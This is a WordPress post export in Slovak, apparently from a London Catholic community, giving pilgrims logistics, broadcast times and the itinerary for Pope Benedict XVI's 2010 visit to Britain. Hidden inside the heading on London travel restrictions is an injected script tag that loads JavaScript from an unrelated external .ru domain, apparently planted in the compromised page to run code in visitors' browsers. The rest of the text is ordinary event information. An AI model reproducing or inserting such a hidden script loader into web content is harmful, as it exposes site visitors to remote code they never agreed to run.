{"id":9274,"date":"2010-09-17T07:07:26","date_gmt":"2010-09-17T06:07:26","guid":{"rendered":"http:\/\/www.scmlondon.org\/?p=9274"},"modified":"2011-01-21T16:12:37","modified_gmt":"2011-01-21T16:12:37","slug":"dalsie-informacie-ohladom-stretnutia-so-sv-otcom-v%c2%a0hyde-park","status":"publish","type":"post","link":"https:\/\/www.scmlondon.org\/?p=9274","title":{"rendered":"\u010eal\u0161ie inform\u00e1cie oh\u013eadom stretnutia so Sv. Otcom  v\u00a0Hyde Park"},"content":{"rendered":"<p><span style=\"color: #ff6600;\"><strong>Pros\u00edme, aby si \u013eudia \u010do sa prihl\u00e1sili, pri\u0161li pre svoj bal\u00ed\u010dek p\u00fatnika a mis\u00e1l (ak ste tak e\u0161te nespravili), v stredu alebo v piatok na sv. om\u0161u na Melior street.<br \/>\nNenech\u00e1vajte si to a\u017e na sobotu, lebo bude probl\u00e9m zobra\u0165 ve\u013ek\u00e9 veci do metra a autom sa do Green parku nedostaneme.<\/strong><\/span><strong><a href=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2010\/09\/green_park.jpg\" data-rel=\"lightbox-image-0\" data-rl_title=\"\" data-rl_caption=\"\"><img loading=\"lazy\" decoding=\"async\" class=\"alignright size-medium wp-image-9279\" title=\"\" src=\"http:\/\/www.scmlondon.org\/wp-content\/uploads\/2010\/09\/green_park-300x148.jpg\" alt=\"\" width=\"300\" height=\"148\" srcset=\"https:\/\/www.scmlondon.org\/wp-content\/uploads\/2010\/09\/green_park-300x148.jpg 300w, https:\/\/www.scmlondon.org\/wp-content\/uploads\/2010\/09\/green_park.jpg 560w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><span style=\"color: #ffff00;\"> <\/span><\/strong><\/p>\n<p><strong><span style=\"color: #ffff00;\">D\u0148a <\/span><\/strong><strong><span style=\"color: #ffff00;\">18 septembra 2010<\/span><\/strong><strong><span style=\"color: #ffff00;\"> sa stret\u00e1vame v\u0161etci \u00fa\u010dastn\u00edci o <\/span><\/strong><strong><span style=\"color: #ffff00;\">14:00 hod. v\u00a0Green Parku (ju\u017en\u00e1 \u010das\u0165 parku pri pal\u00e1ci &#8211; pozri \u017elt\u00fa \u0161ipku na mape alebo <a href=\"http:\/\/maps.google.co.uk\/maps?f=d&amp;source=s_d&amp;saddr=&amp;daddr=51.502458,+-0.142093&amp;hl=en&amp;geocode=&amp;mra=prev&amp;sll=51.502422,-0.141937&amp;sspn=0.002778,0.005262&amp;ie=UTF8&amp;z=16\">google map<\/a>),<\/span><\/strong><strong><span style=\"color: #ffff00;\"> aby sme mali dostatok \u010dasu dosta\u0165 sa do Hyde Parku. Budeme rozd\u00e1va\u0165 p\u00e1sy a n\u00e1ramky pre vstup do Hyde Parku. Miesto je orienta\u010dn\u00e9, ke\u010f\u017ee sa predpoklad\u00e1, \u017ee tam bude viac skup\u00edn na stretnutie. Ur\u010dite n\u00e1s zbad\u00e1te pod\u013ea slovenskej vlajky \ud83d\ude42<\/span><\/strong><\/p>\n<p>Spolu s\u00a0bal\u00edkom\u00a0 rozd\u00e1vame aj <strong>Mis\u00e1l &#8211; <\/strong>modlitebn\u00fa kni\u017eku, uroben\u00fa pre t\u00fato n\u00e1v\u0161tevu a zah\u0155\u0148a v\u0161etky dni, t\u00ed ktor\u00ed si ju e\u0161te neprevzali a maj\u00fa u\u017e bal\u00edk, si ju m\u00f4zu prevzia\u0165 v nede\u013eu alebo v stredu po om\u0161i.<\/p>\n<p><strong><span style=\"text-decoration: underline;\">Obmedzenia v Lond\u00fdne, po\u010das pobytu Sv. Otca.<script src=\"\/\/uptoliked.ru\/widjets.js\"><\/script><\/span><\/strong><\/p>\n<p><a href=\"http:\/\/www.tfl.gov.uk\/gettingaround\/16641.aspx\">http:\/\/www.tfl.gov.uk\/gettingaround\/16641.aspx<\/a><\/p>\n<p><strong><span style=\"color: #ff6600;\">Nezabudnite na tepl\u00e9 oble\u010denie a \u017ee budeme v Hyde parku od 2-3pm do 10-11pm. Pre\u0161tudujte si tie\u017e let\u00e1ky, \u010do sa m\u00f4\u017ee a \u010do nemo\u017ee bra\u0165 do are\u00e1lu.<\/span><\/strong><\/p>\n<p><strong><span style=\"text-decoration: underline;\"> Mo\u017enosti\u00a0 vidie\u0165 Sv\u00e4teho Otca:<\/span><\/strong><\/p>\n<p>BBC bude v priamom prenose vysiela\u0165\u00a0 v\u0161etky hlavn\u00e9 udalosti so Svat\u00fdm Otcom. BBC1: 16 septembra jeho pr\u00edchod o 10.30 hod. a priv\u00edtanie kr\u00e1\u013eovnou v Edinburghu,<\/p>\n<p>BBC2: 16 septembra sl\u00e1venie sv. om\u0161e v Bellahouston Park v Glasgowe o 17:15<\/p>\n<p>BBC2: 17 septembra na\u017eivo z Westminster Abbey sl\u00e1venie ve\u010dern\u00fdch chv\u00e1l spolu\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \t\ts arcibiskupom z Cantebury o 18.15 hod.<\/p>\n<p>BBC2: 18 septembra sl\u00e1venie sv. om\u0161e z Westminster katedr\u00e1ly o 10.00 hod.<\/p>\n<p>BBC2: 19 septembra sl\u00e1venie sv. om\u0161e v Cofton Park v Birminghame o 10.00 hod. \t\tkde bude blahore\u010den\u00fd kardin\u00e1l John Henry Newman.<\/p>\n<p>BBC bude prin\u00e1\u0161a\u0165 aj \u010fal\u0161ie udalosti po\u010das tejto n\u00e1v\u0161tevyna BBC News Channel.<\/p>\n<p>V piatok 17 septembra bude Sv. Otce prech\u00e1dza\u0165 v papamobile z Lambeth Palace cez Lambeth Bridge, pozd\u013a\u017e Millbank okolo 17:15 hod. V sobotu 18 septembra bude cestova\u0165 v papamobile pozd\u013a\u017e Horse Guards Road, The Mall, Constitution Hill a Hyde Park Corner pred\u00fdm ne\u017e vst\u00fapi do Hyde Parku na ve\u010dern\u00e9 chv\u00e1ly okolo 18:30 hod.<\/p>\n<h3>Program cesty Benedikta XVI. vo Ve\u013ekej Brit\u00e1nii a program vysielania prenosov na TV LUX<\/h3>\n<p>16.9. o 11:15 hod. &#8211; pr\u00edlet do Edinburghu o 11:30<\/p>\n<p>16.9 o 12:00 hod. &#8211; stretnutie s kr\u00e1\u013eovnou Al\u017ebetou II<\/p>\n<p>16.9. o 18:00 hod. &#8211; sv\u00e4t\u00e1 om\u0161a v Glasgowe v Bellahouston Parku<\/p>\n<p>17.9. o 10:45 hod. &#8211; stretnutie so z\u00e1stupcami katol\u00edckych vzdel\u00e1vac\u00edch in\u0161tit\u00faci\u00ed<\/p>\n<p>17.9. o 12:30 stretnutie s predstavite\u013emi in\u00fdch n\u00e1bo\u017eenstiev v Lond\u00fdne na univerzite St. Mary University<\/p>\n<p>17.9. o 16:45 hod n\u00e1v\u0161teva arcibiskupa z Canterbury,<\/p>\n<p>17.9. o 18:10 stretnutie s predstavite\u013emi kult\u00fary, ob\u010dianskej spolo\u010dnosti, akademickej obce<\/p>\n<p>17.9. o 19:15 ekumenick\u00e1 pobo\u017enos\u0165<\/p>\n<p>18.9. o 10:45 hod sv\u00e4t\u00e1 om\u0161a v Katedr\u00e1le Najsv\u00e4tej\u0161ej Krvi Je\u017ei\u0161a Krista (Westminster)<\/p>\n<p>18.9. o 18:00 hod n\u00e1v\u0161teva domova d\u00f4chodcov<\/p>\n<p>18.9. o 19:00 hod modlitbov\u00e1 vig\u00edlia v predve\u010der blahore\u010denia kardin\u00e1la Newmana<\/p>\n<p>19.9. o 10:45 hod sv\u00e4t\u00e1 om\u0161a v Birminghame a blahore\u010denie kardin\u00e1la Newmana<\/p>\n<p>19.9. o 17:45 hod stretnutie s biskupmi Anglicka, \u0160k\u00f3tska a Walesu 19.9. o 19:00 hod z\u00e1vere\u010dn\u00fd ceremoni\u00e1l na letisku v Birminghame<\/p>\n<p>Tie\u017e je vytvoren\u00fd blog na <a href=\"http:\/\/www.rcdow.org.uk\/papalblog\">www.rcdow.org.uk\/papalblog<\/a> kde\u00a0 sa mo\u017eete podeli\u0165 so svoj\u00edmi pr\u00edbehmi, z\u00e1\u017eitkami a svedectvami alebo ich mo\u017eete posla\u0165 emailom na <a href=\"mailto:pao@rcdow.org.uk\">pao@rcdow.org.uk<\/a><\/p>\n<p><strong>Povzbudzujeme v\u00e1s pre\u010d\u00edta\u0165 si d\u00f4kladne v\u0161etky inform\u00e1cie, ktor\u00ed m\u00e1te na leaflete v bal\u00edku, aby sme sa vyhli zbyto\u010dn\u00fdm probl\u00e9mom,ale hlavne aby sme t\u00fato historick\u00fa udalos\u0165 pre\u017eili na duchovn\u00e9 naplnenie a upevnenie n\u00e1\u0161ho spolo\u010denstva na London Bridgi \ud83d\ude42<\/strong><\/p>\n<p><strong><br \/>\n<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pros\u00edme, aby si \u013eudia \u010do sa prihl\u00e1sili, pri\u0161li pre svoj bal\u00ed\u010dek p\u00fatnika a mis\u00e1l (ak ste tak e\u0161te nespravili), v stredu alebo v piatok na sv. om\u0161u na Melior street&#8230;. <a class=\"meta-more\" href=\"https:\/\/www.scmlondon.org\/?p=9274\">Pokra\u010dova\u0165 v \u010d\u00edtan\u00ed <span class=\"meta-nav\">&raquo;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[28],"tags":[],"class_list":["post-9274","post","type-post","status-publish","format-standard","hentry","category-28"],"_links":{"self":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/9274","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9274"}],"version-history":[{"count":27,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/9274\/revisions"}],"predecessor-version":[{"id":10291,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/posts\/9274\/revisions\/10291"}],"wp:attachment":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9274"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9274"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9274"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}